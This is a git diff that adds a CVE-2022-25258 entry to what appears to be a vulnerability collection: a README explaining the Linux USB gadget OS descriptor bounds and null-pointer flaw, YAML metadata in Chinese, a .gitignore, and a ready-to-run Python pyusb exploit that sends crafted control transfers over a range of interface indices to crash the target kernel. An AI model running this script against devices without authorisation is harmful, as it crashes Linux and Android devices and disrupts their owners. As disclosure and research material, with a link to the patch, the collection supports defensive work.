diff --git a/cve/linux-kernel/2022/CVE-2022-25258/.gitignore b/cve/linux-kernel/2022/CVE-2022-25258/.gitignore new file mode 100644 index 0000000000000000000000000000000000000000..b6e47617de110dea7ca47e087ff1347cc2646eda --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-25258/.gitignore @@ -0,0 +1,129 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +pip-wheel-metadata/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +.python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ diff --git a/cve/linux-kernel/2022/CVE-2022-25258/README.md b/cve/linux-kernel/2022/CVE-2022-25258/README.md new file mode 100644 index 0000000000000000000000000000000000000000..35ba03b475377d2fe5379bac56d1c07e3ebb261b --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-25258/README.md @@ -0,0 +1,88 @@ +# d-os-descriptor + +## Summary + +The USB Gadget Subsystem includes security issues in the OS descriptor handling +section of composite_setup function (composite.c). Processing of properly +crafted control transfer request messages result in device crash due to null +pointer dereference or memory corruption. + +## Description + +The OS descriptor handling section of composite_setup for interface recipient +is implemented as follows. + +``` +case USB_RECIP_INTERFACE: + if (w_index != 0x5 || (w_value >> 8)) + break; + interface = w_value & 0xFF; + buf[6] = w_index; + count = count_ext_prop(os_desc_cfg, + interface); + put_unaligned_le16(count, buf + 8); + count = len_ext_prop(os_desc_cfg, + interface); + put_unaligned_le32(count, buf); + value = w_length; + if (w_length > 0x0A) { + value = fill_ext_prop(os_desc_cfg, + interface, buf); + if (value >= 0) + value = min_t(u16, w_length, value); +} +break; +``` + +The interface variable is derived from w_value and later utilized to index usb_configuration->interface array +in count_ext_prop, len_ext_prop and fill_ext_prop functions. Since c->interface array has the size of +MAX_CONFIG_INTERFACES (16) elements and interface variable is not validated in neither composite_setup's +OS descriptor handling section nor the called functions this allows an attacker to index the c->interface array +past the actual boundaries. In case interface variable has a value greater or equal to MAX_CONFIG_INTERFACES the +endpoint should be stalled. + +In certain cases, depending on actual memory content indexing past c->interface array may trigger buffer overflow +of req->buf via fill_ext_prop when wLength is greater than 0x0A. If sum of ext_prop->name_len, ext_prop->data_len, +14 and 10 overflows int the count + n >= USB_COMP_EP0_OS_DESC_BUFSIZ condition would not be met allowing overflow +via memcpy in usb_ext_prop_put_binary. Yet the probability of such situation seems pretty low. + +Furthermore the functions count_ext_prop, len_ext_prop and fill_ext_prop are missing validation if the *usb_function +retrieved from c->interface array is actually valid resulting in null pointer dereference. When the retrieved +usb_function pointer is null the endpoint should be stalled. + +``` +static int count_ext_prop(struct usb_configuration *c, int interface) +{ + struct usb_function *f; + int j; + + f = c->interface[interface]; + for (j = 0; j < f->os_desc_n; ++j) { + struct usb_os_desc *d; + + if (interface != f->os_desc_table[j].if_id) + continue; + d = f->os_desc_table[j].os_desc; + if (d && d->ext_compat_id) + return d->ext_prop_count; + } +return 0; +} +``` + +## Impact + +Linux (and Android) devices exposing usb gadgets with OS descriptor support +may be arbitrarily crashed by a malicious host by means of a single control +transfer message. + +## CVE + +[CVE-2022-25258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25258) + +## Patch + +A patch addressing the described issue was accepted and is now available in +supported kernel versions. For more information consult the below link. + +[USB: gadget: validate interface OS descriptor requests](https://github.com/torvalds/linux/commit/75e5b4849b81e19e9efe1654b30d7f3151c33c2c) diff --git a/cve/linux-kernel/2022/CVE-2022-25258/dos_descriptor.py b/cve/linux-kernel/2022/CVE-2022-25258/dos_descriptor.py new file mode 100644 index 0000000000000000000000000000000000000000..53b926ff8110291fa1626c64bf1bf73d570857f8 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-25258/dos_descriptor.py @@ -0,0 +1,99 @@ +#!/usr/bin/python3 + +# +# Sample exploit to demonstrate Linux USB gadget +# subsystem's os descriptor handling flaws. +# +# This script requires pyusb. +# +# https://github.com/szymonh +# + +import argparse + +import usb.core + + +REQ_GET_DESCRIPTOR = 0x06 + + +def auto_int(val: str) -> int: + '''Convert arbitrary string to integer + Used as argparse type to automatically handle input with + different base - decimal, octal, hex etc. + ''' + return int(val, 0) + + +def parse_args() -> argparse.Namespace: + '''Parse command line arguments + + ''' + parser = argparse.ArgumentParser( + description='Sample exploit for interface OS descriptor vulnerability' + ) + + parser.add_argument('-v', '--vid', type=auto_int, required=True, + help='vendor id') + parser.add_argument('-p', '--pid', type=auto_int, required=True, + help='product id') + + return parser.parse_args() + + +def print_request(req_type, req, val, idx, length): + '''Write control transfer request to stdout + + ''' + print('{0:02X} {1:02X} {2:04X} {3:04X} {4:04X} '.format( + req_type, req, val, idx, length), end=' ') + + +def exploit(args: argparse.Namespace) -> None: + '''Attempt exploit the interface OS descriptor + + Kernel will crash due to null pointer dereference and access + beyond array boundaries. + + ''' + usbdev = usb.core.find(idVendor=args.vid, idProduct=args.pid) + if usbdev is None: + print('Device not found, verify specified VID and PID') + return + + for cfg in usbdev: + for idx in range(cfg.bNumInterfaces): + if usbdev.is_kernel_driver_active(idx): + usbdev.detach_kernel_driver(idx) + usbdev.set_configuration() + + data = usbdev.ctrl_transfer(0x80, REQ_GET_DESCRIPTOR, (0x03 << 8) | 0xee, 0x00, 0x12) + if not data or len(data) != 0x12: + print('OS descriptors are not supported') + exit(1) + + vendor_code = data[16] + print('Vendor code: {0}'.format(vendor_code)) + + bmRequestType = 0xc1 # USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_INTERFACE + bRequest = vendor_code # set to vendor code + wValue = 0x00 # upper byte needs to be zero, lower is the interface index + wIndex = 0x05 # needs to be 0x5 + payload = 4096 # value larger than 0x0A + + # iterate throught the c->interface array and beyond + for val in range(0x00, 0xff): + wValue = val + try: + print_request(bmRequestType, bRequest, wValue, wIndex, payload) + data = usbdev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, payload) + print('Read data: {0}'.format(data)) + except usb.core.USBError as e: + print(e) + + +if __name__ == '__main__': + '''Main script + + ''' + exploit(parse_args()) diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml new file mode 100644 index 0000000000000000000000000000000000000000..75f508925d2a26f0fbffba51b8fcd25e29657c64 --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml @@ -0,0 +1,21 @@ +id: CVE-2022-25258 +source: + https://github.com/szymonh/d-os-descriptor +info: + name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。 + severity: medium + description: + 在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现一个问题。USB Gadget子系统缺乏对接口操作系统描述符请求的某些验证(具有大数组索引的请求和与NULL函数指针检索有关的请求)。可能会发生内存损坏。 + scope-of-influence: + Debian 9.0, Debian 10.0, Debian 11.0 + references: + - https://nvd.nist.gov/vuln/detail/CVE-2022-25258 + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.10 + classification: + cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 4.6 + cvi-id: CVE-2022-25258 + cwe-id: CWE-476 + cnvd-id: None + kve-id: None + tags: 内存损坏 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 8af9354f6c70f73c941abb5be60d563a57279b97..62e0b5dda511a35bed313eab276ac83acdcd99ec 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -16,6 +16,7 @@ cve: - CVE-2022-0492 - CVE-2022-2588 - CVE-2022-25636 + - CVE-2022-25258 - CVE-2023-0045 sudo: - CVE-2021-3156